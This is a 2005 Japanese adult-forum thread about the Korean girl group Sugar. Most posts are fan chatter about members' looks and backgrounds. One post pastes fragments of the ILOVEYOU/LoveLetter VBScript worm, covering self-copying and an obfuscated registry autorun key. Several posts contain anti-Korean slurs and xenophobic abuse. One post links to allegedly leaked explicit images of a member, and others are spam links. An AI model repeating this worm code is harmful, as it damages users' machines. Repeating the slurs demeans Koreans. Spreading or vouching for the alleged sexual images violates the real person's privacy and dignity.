シュガー - sugar
0001名無しさん@ピンキー2005/10/23(日) 03:47:52ID:Wx8gGtKZ

アユミ・スジン・ヘスン・ハリンの4人組ユニット"Sugar"

official http://www.sugar.cd/entrance/index.htm
0003名無しさん@ピンキー2005/10/23(日) 05:33:30ID:???
3get!!
正直まだ特別ファンって訳でも無いんですが、
スジンが一番好き☆
メンバーの中で一番韓国女性らしい顔つきだから。
脚長いし綺麗だし・・・(*−。)
0004名無しさん@ピンキー2005/10/25(火) 15:51:46ID:ds6ZFQrL
4get!!
私も特別ファンではないが、ハニカミ見て、スジン好きになった。
0005名無しさん@ピンキー2005/10/26(水) 05:11:59ID:g5AJB6FN
韓国人らしい顔はエラが張ってます。スジンはチャイニーズ系
0009名無しさん@ピンキー2005/11/03(木) 09:30:36ID:gaDexnf5
砂糖
0010名無しさん@ピンキー2005/11/05(土) 04:47:37ID:zUIqQjwE
アユミたん
(;´Д`)ハァハァ・・・
0011ハァハァ2005/11/05(土) 06:00:56ID:???
シュガーのスジンは昔、紹介アガシだったんだって、アジュマが言ってたよん〜、ヤリテー( ̄〜 ̄)ξ
0012名無しさん@ピンキー2005/11/05(土) 09:21:34ID:BUako0hz
スジン可愛い!
0014名無しさん@ピンキー2005/11/05(土) 20:35:16ID:WAo+cBUN
ハリン、かわいい!!
0015名無しさん@ピンキー2005/11/07(月) 10:23:37ID:8smpWNi6
スジン最高!
0016名無しさん@ピンキー2005/11/07(月) 11:58:36ID:7xp9WTvs
なんで、Mステでないんだ。
ホリプロパワーは、Mステには、通用しないのか?
0017名無しさん@ピンキー2005/11/07(月) 12:14:34ID:7k1xpMZr
16 名前:名無しさん@ピンキー[] 投稿日:2005/11/07(月) 11:58:36 ID:7xp9WTvs
なんで、Mステでないんだ。
ホリプロパワーは、Mステには、通用しないのか?
0018アガシ2005/11/07(月) 15:33:43ID:dK00UI8N
スジン、、、ヤリテ〜( ̄〜 ̄)ξ
0019名無しさん@ピンキー2005/11/07(月) 17:20:05ID:???
このサイトで真実を知りましょう
0022名無しさん@ピンキー2005/11/08(火) 10:05:00ID:hV5jssu3
スジンは整形してないよね?
0023名無しさん@ピンキー2005/11/08(火) 10:15:00ID:nwvvFMMA
スジンは、整形してない。
無修正です。
0025名無しさん@ピンキー2005/11/10(木) 10:15:02ID:yIvuTyWJ
アユミって日本人なの?
0027名無しさん@ピンキー2005/11/12(土) 08:13:49ID:XFC4S1vb
アユミは、韓国人です。
父は、在日韓国人、母は、韓国人の、在日3世だったとおもうよ。
0028名無しさん@ピンキー2005/11/12(土) 13:27:11ID:MWC/T2nx
⊃<・`◎´・>
0029名無しさん@ピンキー2005/11/12(土) 15:35:52ID:Ei8wxMAZ
お気に入りのスジン画像

ttp://photoimg.enjoyjapan.naver.com/view/47/43/enjoyjapan_4/170000/169426.jpg
ttp://photoimg.enjoyjapan.naver.com/view/47/43/enjoyjapan_4/163000/162789.jpg
ttp://photoimg.enjoyjapan.naver.com/view/47/43/enjoyjapan_4/163000/162987.jpg
ttp://photoimg.enjoyjapan.naver.com/view/47/43/enjoyjapan_4/164000/163003.jpg
ttp://photoimg.enjoyjapan.naver.com/view/47/43/enjoyjapan_4/165000/164165.jpg
0030名無しさん@ピンキー2005/11/13(日) 00:09:49ID:???
>>29
激しくおちゅ!!
ありがとん^^^^^^^
その好意が最高にうれぢい。。。
前のスジン話をまだ覚えてたのがうれしい。。
ありがとーーー。今後とも宜しく。
漏れ的には、1枚目は全員SEXYでCOOLな雰囲気で最高。
2枚目は全身、脚まであるから嬉しい。。
0031名無しさん@ピンキー2005/11/13(日) 00:50:40ID:BQ7TgAvW
>30
 「ひまわり」のPV見てください。
 すっごくエロいですよ。
 あれ見てると、我慢できなくなる。
0032名無しさん@ピンキー2005/11/13(日) 01:40:51ID:EPDfD1rv
⊃<・`◎´・>
0033名無しさん@ピンキー2005/11/13(日) 05:46:37ID:???
>>31
あpってくれくれません?−0−;)
てか、可愛い系は苦手(汗 SEXY COOL系で観たいお。

>>26 >>27
日本の鳥取県出身って書いてるところと、韓国出身と書いてるところとある。。
実際どっちなんだろうね。。鳥取って、県で書いてるところを見ると、生まれか
もしくは育ちのどちらかは日本である事は間違いないな。
0034名無しさん@ピンキー2005/11/13(日) 08:46:31ID:BQ7TgAvW
>33
 生まれも育ちも、日本です。たしか、中学卒業と同時に韓国にいったんじゃないかな。
 あっちのほうにおばあちゃんいるし。
 それで、韓国国籍に変えたんじゃなかったかな。
0036名無しさん@ピンキー2005/11/14(月) 21:25:12ID:???
>>34
なーほど。。
よくわかったアリがトン乙!!
しかしまぁ、韓国が好きで、自分が決めたんなら
いいんでないかい?
ただ中学までいたなら、かなりの決断だったと思うね。
日本は嫌いなのかな。。
0037名無しさん@ピンキー2005/11/14(月) 21:50:54ID:gPMCLZY7
世界を旅しないなら、韓国にずっと居るんなら、韓国国籍でもいいんじゃないかな。
海外で、何人と聞かれて、韓国人といっただけで、いやな顔されることがほとんどだということおそらく韓国国民のほとんどは知らないだろうね。
0039名無しさん@ピンキー2005/11/15(火) 07:13:00ID:6dQu6Qsa
>38
整形して韓国顔でなくなったが正解。
0041名無しさん@ピンキー2005/11/15(火) 18:09:47ID:/K7IfIKM
>>34
韓国国籍って、もとから韓国籍でしょう。
在日韓国人でしょこの人。
韓国に戸籍を作ったって意味ですか?
0042名無しさん@ピンキー2005/11/15(火) 19:25:07ID:???
アユミが気が強い、打たれにくい理由は在日韓国人だからなんだね
今まで相当嫌な思いをしたり、出生を憎んだりしたと思うよ
整形したと人にどう言われようが屁とも思わないんじゃないかな
まあ自由に生きていけばいいんじゃないかなと
0043名無しさん@ピンキー2005/11/15(火) 19:42:43ID:/K7IfIKM
亜由美さんは韓国に生活基盤をつくったというのはすごいと思います。
文句ばっか帰らない在日がほとんどですから。
0045名無しさん@ピンキー2005/11/16(水) 21:21:27ID:sck6fObp
>44
 よく見なくてもかわいい。
0047名無しさん@ピンキー2005/11/17(木) 16:12:52ID:wP6DraOO
yahoo???
0048名無しさん@ピンキー2005/11/18(金) 16:51:17ID:ob3IOqLt
スジン
0050名無しさん@ピンキー2005/11/19(土) 00:56:41ID:khSfqNqd
ジョンウム→ハリン
いつ変わったの?
しばらく見てなかったから。
0052名無しさん@ピンキー2005/11/19(土) 10:33:04ID:RlNb2pan
みんな日本デビューしたがってるからね
日本のユニットに比べたら歌もダンスもちゃんと練習してるし
いいんじゃない?
0053名無しさん@ピンキー2005/11/19(土) 10:47:35ID:6pkNc1Aw
スジン最高!
0054名無しさん@ピンキー2005/11/19(土) 18:44:32ID:J1j6hkqS
>52
 朝鮮人は、うざい。来るな!!
 大多数の日本人の意見。
0057名無しさん@ピンキー2005/11/19(土) 19:49:44ID:Rq5WXP/3
>52
 韓国では、稼ぐことができないから、日本に出稼ぎにくるということだよな。
 ていうか、あいつら、日本に来ても、韓国語でしか歌わないから、歌詞の意味もわかんないし、感動もしないし、ただ耳障りなだけなんだけど。
 
 
0058名無しさん@ピンキー2005/11/20(日) 01:13:10ID:o8H5bKNz
>>51ありがd
0060名無しさん@ピンキー2005/11/21(月) 16:24:00ID:MdZpSvtF
スジン可愛い!
0061名無しさん@ピンキー2005/11/21(月) 18:13:10ID:9EEHD5vC
沢尻エリカ、可愛い!
0063名無しさん@ピンキー2005/11/22(火) 16:14:14ID:???
>>43
ロンチャーズ(かな?)の新井由理も韓国でデビューするために韓国でのコンテストに出てた。
TV朝日のドキュメンタリー番組「テレメンタリー」で彼女を特集していてそれを知ったけど。
その後どうしちゃったのかな?
0064名無しさん@ピンキー2005/11/22(火) 22:53:05ID:qJb1IdtY
その意気でどんどん帰ってくれ
0065名無しさん@ピンキー2005/11/23(水) 00:22:28ID:i3uZSWV4
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
0066名無しさん@ピンキー2005/11/23(水) 09:09:33ID:l4rSXmuh
>>65
これ何?
0067名無しさん@ピンキー2005/11/23(水) 09:12:18ID:KJBEwg0j
>66
 同意
0069名無しさん@ピンキー2005/11/23(水) 19:03:47ID:RcmDs9xE
>>63
いつの放送ですか?<「テレメンタリー」
0071名無しさん@ピンキー2005/11/23(水) 23:24:06ID:YFGrS/Fd
ボジ の毛がみえます。
0072名無しさん@ピンキー2005/11/24(木) 16:14:45ID:tDnoQcbv
スジン最高!
0074名無しさん@ピンキー2005/11/24(木) 20:36:49ID:AdND7rBO
沢尻エリカ、可愛い!
0076名無しさん@ピンキー2005/11/25(金) 11:04:52ID:oqiu0rs/
スジン可愛い!
0078ジャック2005/11/25(金) 16:16:31ID:fQTb1riQ
もう人生に飽きたであろう・・・。さぁ、諸君!さらなる刺激を求めるんだ!
http://www.unti-yahoo.com/
0081名無しさん@ピンキー2005/11/26(土) 10:43:56ID:FRb7rsIS
スジン最高!
0084名無しさん@ピンキー2005/11/28(月) 07:03:34ID:eM0nRrTo
S.E.Sのシューって、誰?
0088つんくのみぎ2005/11/28(月) 17:11:23ID:3MLyRwZk
PCも携帯も貼り付け及びダウンロード可能な画像掲示板はココしかないな!
http://www.hl-homes.com/
0089名無しさん@ピンキー2005/11/28(月) 23:47:25ID:u7I45QB1
スジン最高!
0090名無しさん@ピンキー2005/11/29(火) 11:45:10ID:YQl0L8R3
ここをsugarの画像スレにしよう
0091名無しさん@ピンキー2005/11/29(火) 12:40:51ID:q1qS83/x
セガのゲーセンのポスターで好きになった(;´Д`)ハァハァ
でも漏れはあゆみだけだな。
0092名無しさん@ピンキー2005/11/29(火) 14:58:44ID:???
カレイドスターとかってアニメとタイアップしてた人達だっけ?
0093まるぽ2005/11/29(火) 16:26:50ID:NkSbl5fG
PCも携帯も貼り付け及びダウンロード可能な画像掲示板はココしかないな!
http://www.hl-homes.com/
0094名無しさん@ピンキー2005/11/29(火) 22:36:00ID:GixLf7vv

マンコ丸見えだ!
0095名無しさん@ピンキー2005/11/30(水) 10:57:40ID:eT1vGse6
なかなか売れないなぁ、こいつら。
アイドルって売り出すには、年齢がいきすぎたかな?
0096名無しさん@ピンキー2005/11/30(水) 11:59:28ID:v1DQS3ZJ
どう見ても本人に見えるのだが、やばすぎるな
いくら20歳を過ぎたとは言っても、一応アイドルなんだから

まんこに完全に挿入されてる画像が、これだけ出回っちゃまずいだろ


http://pie.bbspink.com/test/read.cgi/girls/1129072756/38
0097名無しさん@ピンキー2005/11/30(水) 18:31:05ID:DIyKwh2G
>>96
完全に顔まで写ってるじゃん
0098名無しさん@ピンキー2005/11/30(水) 23:54:05ID:toTRsTks
スジン可愛い!
0099名無しさん@ピンキー2005/12/01(木) 06:05:45ID:3qvHrKcU
http://www3.ocn.ne.jp/~izumatsu/telemen.htm#031124
0100名無しさん@ピンキー2005/12/01(木) 06:06:47ID:3qvHrKcU
100
レスを投稿する


ニューススポーツなんでも実況